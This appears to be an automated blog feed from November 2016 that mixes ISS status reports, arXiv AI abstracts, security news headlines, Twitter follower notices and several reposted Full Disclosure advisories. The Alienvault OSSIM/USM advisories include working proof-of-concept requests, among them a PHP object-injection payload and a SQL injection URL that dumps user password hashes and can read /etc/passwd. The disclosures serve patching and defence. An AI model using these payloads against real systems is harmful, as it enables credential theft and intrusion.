HAM Radio Transceiver Swap Cygnus Cargo Operations Biomolecule Sequencer Sample Stop [Completed Saturday] PMA1 IMV Cone Screen Cleaning [Completed Saturday] Fluid Shifts Ziplock Inventory [Completed Saturday] Food Warmer Inspection [Completed Saturday] Data Prep for Return [Completed Saturday]

Ground Activities
All activities were completed unless otherwise noted.
Lab MCA Full Calibration Reboost with SM Main Engines P4 IEA Survey

Three-Day Look Ahead:
Wednesday, 11/03: Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) retrieval/install/leak check, IV TEPC relocate from N2 to N3
Thursday, 11/04: Cygnus cargo transfer, HRF blood collection setup
Friday, 11/05: HRF centrifuge setup & blood collection/stow, Recycle tank drain to EDV, Cygnus cargo transfer

QUICK ISS Status – Environmental Control Group:

Component: Status
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System (“SKV1”): Off
[СКВ] 2 – SM Air Conditioner System (“SKV2”): On
Carbon Dioxide Removal Assembly (CDRA) Lab: Standby
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Operate
Major Constituent Analyzer (MCA) Node 3: Idle
Oxygen Generation Assembly (OGA): Shutdown
Urine Processing Assembly (UPA): Idle
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2fE6KUL
via IFTTT

Integrate with anonymous log-in module

When the module is used together with anonymous log-in (http://ift.tt/2e1Q9JM) the advanced aggregate module stops ...

from Google Alert - anonymous http://ift.tt/2ezvrNM
via IFTTT

Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System

Hey Webmasters, are you using Memcached to boost the performance of your website? Beware! It might be vulnerable to remote hackers. Three critical Remote Code Execution vulnerabilities have been reported in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, Reddit, to hackers. Memcached is a fabulous


from The Hacker News http://ift.tt/2emR1aq
via IFTTT

Microsoft Says Russian Hackers Using Unpatched Windows Bug Disclosed by Google

Google's Threat Analysis Group publicly disclosed on Monday a critical zero-day vulnerability in most versions of Windows just 10 days after privately disclosing both zero days to Microsoft and Adobe. While Adobe rushed an emergency patch for its Flash Player software on October 26, Microsoft had yet to release a fix. Microsoft criticized Google's move, saying that the public disclosure of


from The Hacker News http://ift.tt/2ecQtRs
via IFTTT

Simplifying SSH keys and SSL Certs Management across the Enterprise using Key Manager Plus

With rapidly growing web-based services and widely expanding locations, organizations are using more and more SSL certificates as well as SSH keys than ever. From authentication, confidentiality, and integrity to preventing the organization from industrial espionage, SSL certificates play an important role. Managing SSL certificates across networks to ensure protection and prevent


from The Hacker News http://ift.tt/2e11oSL
via IFTTT

Arp 299: Black Holes in Colliding Galaxies


Is only one black hole spewing high energy radiation -- or two? To help find out, astronomers trained NASA's Earth-orbiting NuSTAR and Chandra telescopes on Arp 299, the enigmatic colliding galaxies expelling the radiation. The two galaxies of Arp 299 have been locked in a gravitational combat for millions of years, while their central black holes will soon do battle themselves. Featured, the high-resolution visible-light image was taken by Hubble, while the superposed diffuse glow of X-ray light was imaged by NuSTAR and shown in false-color red, green, and blue. NuSTAR observations show that only one of the central black holes is seen fighting its way through a region of gas and dust -- and so absorbing matter and emitting X-rays. The energetic radiation, coming only from the galaxy center on the right, is surely created nearby -- but outside -- the central black hole's event horizon. In a billion years or so, only one composite galaxy will remain, and only one central supermassive black hole. Soon thereafter, though, another galaxy may enter the fray. via NASA http://ift.tt/2f8LuDd

I have a new follower on Twitter


Andrew Thomas
Co-Founder & CRO of SkyBell. Writer at Inc, Forbes, HuffPo. #IoT & Crowdfunding Expert. Advisor & Speaker. YEC. USC. Snapchat: ibeapt
San Francisco, CA
https://t.co/gj15v3Xby1
Following: 3486 - Followers: 3941

November 02, 2016 at 12:04AM via Twitter http://twitter.com/apthomas

Tuesday, November 1, 2016

I have a new follower on Twitter


Marty Loughlin
Smart #datalake - #semantic #bigdata #fintech #analytics #hadoop #spark @CamSemantics Family, F1, Soccer, fast cars, cooking, cycling; Married to @marialoughlin
Boston, MA (from Dublin, Ire)
https://t.co/ILJHVSwKay
Following: 12107 - Followers: 15088

November 01, 2016 at 11:24PM via Twitter http://twitter.com/mloughlin

I have a new follower on Twitter


Chris Gadek
Head of Marketing | Growth @Doorman. Dandy. Rockstar lookalike. Full stack marketer. Data science nerd.
San Francisco, CA
https://t.co/Y4HPcGOfDr
Following: 9222 - Followers: 13348

November 01, 2016 at 08:54PM via Twitter http://twitter.com/dappermarketer

I have a new follower on Twitter


Internet Billboards
Official Twitter account for Internet Billboards. The Web Curated. Content #Curator's. #curation services. Hello, I am the founder Tom George. Follow US!
USA
https://t.co/ZnJMi4Q0gT
Following: 15862 - Followers: 19700

November 01, 2016 at 08:54PM via Twitter http://twitter.com/netbillboards

[FD] Microsoft Internet Explorer 9 MSHTML CAttrArray use-after-free details

Throughout November, I plan to release details on vulnerabilities I found in web-browsers which I've not released before. This is the first entry in that series. The below information is also available on my blog at http://ift.tt/2e9pdmJ. There you can find a repro that triggered this issue in addition to the information below.

Follow me on http://twitter.com/berendjanwever for daily browser bugs.

MSIE 9 MSHTML CAttrArray use-after-free
=======================================
(MS14-056, CVE-2014-4141)

Synopsis

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8580 - Alienvault OSSIM/USM Object Injection Vulnerability

Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: PHP Object Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8580
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
A PHP object injection vulnerability exists in multiple widget files due to the unsafe use of the unserialize() function. The affected files include flow_chart.php, gauge.php, honeypot.php, image.php, inventory.php, otx.php, rss.php, security.php, siem.php, taxonomy.php, tickets.php, and url.php. An authenticated attacker could send a serialized PHP object to one of the vulnerable pages and potentially gain code execution via magic methods in included classes.

POC
====
This benign POC injects the IDS_Report class from PHPIDS into the refresh parameter of image.php. The __toString method of IDS_Report is then executed and the output is displayed in the value of the content field in the response:

/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22%00*%00events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22%00*%00tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22%00*%00impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
http://ift.tt/2ebIzHT

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8581 - Alienvault OSSIM/USM Stored XSS Vulnerability

Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Stored XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8581
CVSS: 3.5
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
A stored XSS vulnerability exists in the User-Agent header of the login process. It's possible to inject a script into that header that then gets executed when mousing over the User-Agent field in Settings -> Current Sessions.

POC
===
The POC uses jQuery to send all session IDs on the "Current Sessions" page to an arbitrary site (Google, in this case)

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
http://ift.tt/2ebIzHT

Source: Gmail -> IFTTT-> Blogger

Neural Symbolic Machines: Learning Semantic Parsers on Freebase with Weak Supervision. (arXiv:1611.00020v1 [cs.CL])

Extending the success of deep neural networks to natural language understanding and symbolic reasoning requires complex operations and external memory. Recent neural program induction approaches have attempted to address this problem, but are typically limited to differentiable memory, and consequently cannot scale beyond small synthetic tasks. In this work, we propose the Manager-Programmer-Computer framework, which integrates neural networks with non-differentiable memory to support abstract, scalable and precise operations through a friendly neural computer interface. Specifically, we introduce a Neural Symbolic Machine, which contains a sequence-to-sequence neural "programmer", and a non-differentiable "computer" that is a Lisp interpreter with code assist. To successfully apply REINFORCE for training, we augment it with approximate gold programs found by an iterative maximum likelihood training process. NSM is able to learn a semantic parser from weak supervision over a large knowledge base. It achieves new state-of-the-art performance on WebQuestionsSP, a challenging semantic parsing dataset, with weak supervision. Compared to previous approaches, NSM is end-to-end, therefore does not rely on feature engineering or domain specific knowledge.



from cs.AI updates on arXiv.org http://ift.tt/2eZ8KDc
via IFTTT

Learning recurrent representations for hierarchical behavior modeling. (arXiv:1611.00094v1 [cs.AI])

We propose a framework for detecting action patterns from motion sequences and modeling the sensory-motor relationship of animals, using a generative recurrent neural network. The network has a discriminative part (classifying actions) and a generative part (predicting motion), whose recurrent cells are laterally connected, allowing higher levels of the network to represent high level phenomena. We test our framework on two types of data, fruit fly behavior and online handwriting. Our results show that 1) taking advantage of unlabeled sequences, by predicting future motion, significantly improves action detection performance when training labels are scarce, 2) the network learns to represent high level phenomena such as writer identity and fly gender, without supervision, and 3) simulated motion trajectories, generated by treating motion prediction as input to the network, look realistic and may be used to qualitatively evaluate whether the model has learnt generative control rules.



from cs.AI updates on arXiv.org http://ift.tt/2ebHXSA
via IFTTT

Robust Spectral Inference for Joint Stochastic Matrix Factorization. (arXiv:1611.00175v1 [cs.LG])

Spectral inference provides fast algorithms and provable optimality for latent topic analysis. But for real data these algorithms require additional ad-hoc heuristics, and even then often produce unusable results. We explain this poor performance by casting the problem of topic inference in the framework of Joint Stochastic Matrix Factorization (JSMF) and showing that previous methods violate the theoretical conditions necessary for a good solution to exist. We then propose a novel rectification method that learns high quality topics and their interactions even on small, noisy data. This method achieves results comparable to probabilistic techniques in several domains while maintaining scalability and provable optimality.



from cs.AI updates on arXiv.org http://ift.tt/2f7Z9Ny
via IFTTT

Local Subspace-Based Outlier Detection using Global Neighbourhoods. (arXiv:1611.00183v1 [cs.AI])

Outlier detection in high-dimensional data is a challenging yet important task, as it has applications in, e.g., fraud detection and quality control. State-of-the-art density-based algorithms perform well because they 1) take the local neighbourhoods of data points into account and 2) consider feature subspaces. In highly complex and high-dimensional data, however, existing methods are likely to overlook important outliers because they do not explicitly take into account that the data is often a mixture distribution of multiple components.

We therefore introduce GLOSS, an algorithm that performs local subspace outlier detection using global neighbourhoods. Experiments on synthetic data demonstrate that GLOSS more accurately detects local outliers in mixed data than its competitors. Moreover, experiments on real-world data show that our approach identifies relevant outliers overlooked by existing methods, confirming that one should keep an eye on the global perspective even when doing local outlier detection.



from cs.AI updates on arXiv.org http://ift.tt/2eZ8swm
via IFTTT

Towards Lifelong Self-Supervision: A Deep Learning Direction for Robotics. (arXiv:1611.00201v1 [cs.RO])

Despite outstanding success in vision amongst other domains, many of the recent deep learning approaches have evident drawbacks for robots. This manuscript surveys recent work in the literature that pertains to applying deep learning systems to the robotics domain, either as means of estimation or as a tool to resolve motor commands directly from raw percepts. These recent advances are only a piece to the puzzle. We suggest that deep learning as a tool alone is insufficient in building a unified framework to acquire general intelligence. For this reason, we complement our survey with insights from cognitive development and refer to ideas from classical control theory, producing an integrated direction for a lifelong learning architecture.



from cs.AI updates on arXiv.org http://ift.tt/2f7ZZcR
via IFTTT

Towards Blended Reactive Planning and Acting using Behavior Trees. (arXiv:1611.00230v1 [cs.RO])

In this paper, we study the problem of using a planning algorithm to automatically create and update a Behavior Tree (BT), controlling a robot in a dynamic environment. Exploiting the characteristic of BTs, in terms of modularity and reactivity, the robot continually acts and plans to achieve a given goal using a set of abstract actions and conditions. The construction of the BT is based on an extension of the Hybrid Backward-Forward algorithm (HBF) that allows us to refine the acting process by mapping the descriptive models onto operational models of actions, thus integrating the ability of planning in infinite state space of HBF with the continuous modular reactive action execution of BTs. We believe that this might be a first step to address the recently raised open challenge in automated planning: the need of a hierarchical structure and a continuous online planning and acting framework. We prove the convergence of the proposed approach as well as the absence of deadlocks and livelocks, and we illustrate our approach in two different robotics scenarios.



from cs.AI updates on arXiv.org http://ift.tt/2eZcqEZ
via IFTTT

Detecting Affordances by Visuomotor Simulation. (arXiv:1611.00274v1 [cs.AI])

The term "affordance" denotes the behavioral meaning of objects. We propose a cognitive architecture for the detection of affordances in the visual modality. This model is based on the internal simulation of movement sequences. For each movement step, the resulting sensory state is predicted by a forward model, which in turn triggers the generation of a new (simulated) motor command by an inverse model. Thus, a series of mental images in the sensory and in the motor domain is evoked. Starting from a real sensory state, a large number of such sequences is simulated in parallel. Final affordance detection is based on the generated motor commands. We apply this model to a real-world mobile robot which is faced with obstacle arrangements some of which are passable (corridor) and some of which are not (dead ends). The robot's task is to detect the right affordance ("pass-through-able" or "non-pass-through-able"). The required internal models are acquired in a hierarchical training process. Afterwards, the robotic agent is able to distinguish reliably between corridors and dead ends. This real-world result enhances the validity of the proposed mental simulation approach. In addition, we compare several key factors in the simulation process regarding performance and efficiency.



from cs.AI updates on arXiv.org http://ift.tt/2f83fFd
via IFTTT

Using Artificial Intelligence to Identify State Secrets. (arXiv:1611.00356v1 [cs.AI])

Whether officials can be trusted to protect national security information has become a matter of great public controversy, reigniting a long-standing debate about the scope and nature of official secrecy. The declassification of millions of electronic records has made it possible to analyze these issues with greater rigor and precision. Using machine-learning methods, we examined nearly a million State Department cables from the 1970s to identify features of records that are more likely to be classified, such as international negotiations, military operations, and high-level communications. Even with incomplete data, algorithms can use such features to identify 90% of classified cables with <11% false positives. But our results also show that there are longstanding problems in the identification of sensitive information. Error analysis reveals many examples of both overclassification and underclassification. This indicates both the need for research on inter-coder reliability among officials as to what constitutes classified material and the opportunity to develop recommender systems to better manage both classification and declassification.



from cs.AI updates on arXiv.org http://ift.tt/2eZ8DYe
via IFTTT

Separating Sets of Strings by Finding Matching Patterns is Almost Always Hard. (arXiv:1604.03243v2 [cs.CC] UPDATED)

We study the complexity of the problem of searching for a set of patterns that separate two given sets of strings. This problem has applications in a wide variety of areas, most notably in data mining, computational biology, and in understanding the complexity of genetic algorithms. We show that the basic problem of finding a small set of patterns that match one set of strings but do not match any string in a second set is difficult (NP-complete, W[2]-hard when parameterized by the size of the pattern set, and APX-hard). We then perform a detailed parameterized analysis of the problem, separating tractable and intractable variants. In particular we show that parameterizing by the size of pattern set and the number of strings, and the size of the alphabet and the number of strings give FPT results, amongst others.



from cs.AI updates on arXiv.org http://ift.tt/1VkQl5g
via IFTTT

Hadamard Product for Low-rank Bilinear Pooling. (arXiv:1610.04325v2 [cs.CV] UPDATED)

Bilinear models provide rich representations compared with linear models. They have been applied in various visual tasks, such as object recognition, segmentation, and visual question-answering, to get state-of-the-art performances taking advantage of the expanded representations. However, bilinear representations tend to be high-dimensional, limiting the applicability to computationally complex tasks. We propose low-rank bilinear pooling using Hadamard product for an efficient attention mechanism of multimodal learning. We show that our model outperforms compact bilinear pooling in visual question-answering tasks with the state-of-the-art results on the VQA dataset, having a better parsimonious property.



from cs.AI updates on arXiv.org http://ift.tt/2ed1inE
via IFTTT

[FD] CVE-2016-8582 - Alienvault OSSIM/USM SQL Injection Vulnerability

Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: SQL Injection
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8582
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
A SQL injection vulnerability exists in the value parameter of /ossim/dashboard/sections/widgets/data/gauge.php on line 231. By sending a serialized array with a SQL query in the type field, it's possible to execute an arbitrary SQL query. The result is not displayed on the screen, but it can be exploited as a blind SQLi or have the output directed to a file and then retrieved via another request. Authentication is required.

POC
===
This request will dump user password hashes to a file:

/ossim/dashboard/sections/widgets/data/gauge.php?&type=alarm&wtype=blah&asset=1&height=1&value=a%3A1%3A%7Bs%3A4%3A%22type%22%3Bs%3A67%3A%22pass+from+users+INTO+OUTFILE+%27%2Ftmp%2F10.0.0.123_pass_tshark.pcap%27--+-%22%3B%7D

The file containing the output can then be retrieved with the following request:

/ossim/pcap/download.php?scan_name=pass&sensor_ip=10.0.0.123

It's also possible to read the contents of any file readable by the mysql user by using mysql's load_file function. For example, changing the request to something like select load_file('/etc/passwd') .

Timeline
========
08/03/16 - Reported to Vendor
10/03/16 - Fixed in version 5.3.2

References
==========
http://ift.tt/2ebIzHT

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8583 - Alienvault OSSIM/USM Reflected XSS

Details
=======
Product: Alienvault OSSIM/USM
Vulnerability: Reflected XSS
Author: Peter Lapp, lappsec () gmail com
CVE: CVE-2016-8583
Vulnerable Versions: <=5.3.1
Fixed Version: 5.3.2

Vulnerability Details
=====================
Multiple GET parameters in the vulnerability scan scheduler of OSSIM/USM before 5.3.2 are vulnerable to reflected XSS. The parameters include jobname, timeout, sched_id, and targets[] in /ossim/vulnmeter/sched.php.

POC
===
Example payload is: ">

Source: Gmail -> IFTTT-> Blogger

[FD] MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition Exploit [CVE-2016-6663 / OCVE-2016-5616]

CVE-2016-6663 / OCVE-2016-5616

Vulnerability: MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition
Discovered by: Dawid Golunski @dawid_golunski http://legalhackers.com

Affected versions:

MariaDB
  < 5.5.52
  < 10.1.18
  < 10.0.28

MySQL
  <= 5.5.51
  <= 5.6.32
  <= 5.7.14

Percona Server
  < 5.5.51-38.2
  < 5.6.32-78-1
  < 5.7.14-8

Percona XtraDB Cluster
  < 5.6.32-25.17
  < 5.7.14-26.17
  < 5.5.41-37.0

An independent research has revealed a race condition vulnerability which affects MySQL, MariaDB and PerconaDB databases. The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql').

Successful exploitation would allow an attacker to gain full read/write access to all of the files (including configuration files) and databases belonging to the affected database server.

The obtained level of access upon the exploitation, could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from mysql user to root user and thus allow attackers to fully compromise the target server.

The full up-to-date advisory and a PoC exploit can be found at: http://ift.tt/2ftahpB

PoC Video: http://ift.tt/2faWtMH

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Multiple SQL injection vulnerabilities in dotCMS (8x CVE)

User: anonymous is not authorized

I receive the error message “User: anonymous is not authorized” when attempting to access my Amazon Elasticsearch Service domain from the AWS ...

from Google Alert - anonymous http://ift.tt/2eYZPBB
via IFTTT

One Way B2B Marketers Should be Using Website Traffic (But Aren't)

Find out how you can shape your personalized marketing strategy using traffic data from anonymous B2B website visitors with this infographic.

from Google Alert - anonymous http://ift.tt/2fC2jtk
via IFTTT

SCANDAL!

Weiner, who clearly has serious personal problems, was too close to highly classified material that was transmitted between his wife and Hillary on an ...

from Google Alert - anonymous http://ift.tt/2fB8mhJ
via IFTTT

Ravens (3-4) up 1 spot to No. 20 in Week 9 NFL Power Rankings; next game Sunday vs. Steelers (4-3) (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Researchers Claim Wickr Patched Flaws but Didn't Pay Rewards

Topic: Researchers Claim Wickr Patched Flaws but Didn't Pay Rewards
Source: http://ift.tt/2fwuXMj

Wickr Inc Secret Messenger - Bug Bounty Program Vulnerabilities by Design - Wickr Inc - When honesty disappears behind the VCP Mountain -

References: http://ift.tt/2eWDXHG
Connected Articles: http://ift.tt/1NE78vp
Playlist: https://www.youtube.com/playlist?list=PL2hn_NNM3yw-3svLm9UdSzvlVVZcx5DxV
Tags: #security #vulnerability #wickr #exploitation #research #messenger #secret

Source: Gmail -> IFTTT-> Blogger

The Hacker News (THN) Celebrates 6th Anniversary Today

Can you believe that it's been 6 years since we first launched The Hacker News? Yes, The Hacker News is celebrating its sixth anniversary today on 1st November. We started this site on this same day back in 2010 with the purpose of providing a dedicated platform to deliver latest infosec news and threat updates for Hackers, Security researchers, technologists, and nerds. Time flies when


from The Hacker News http://ift.tt/2fqq5ct
via IFTTT

New IoT Botnet Malware Discovered; Infecting More Devices Worldwide

The whole world is still dealing with the Mirai IoT Botnet that caused vast internet outage last Friday by launching massive distributed denial of service (DDoS) attacks against the DNS provider Dyn, and researchers have found another nasty IoT botnet. Security researchers at MalwareMustDie have discovered a new malware family designed to turn Linux-based insecure Internet of Things (IoT)


from The Hacker News http://ift.tt/2fcyPOj
via IFTTT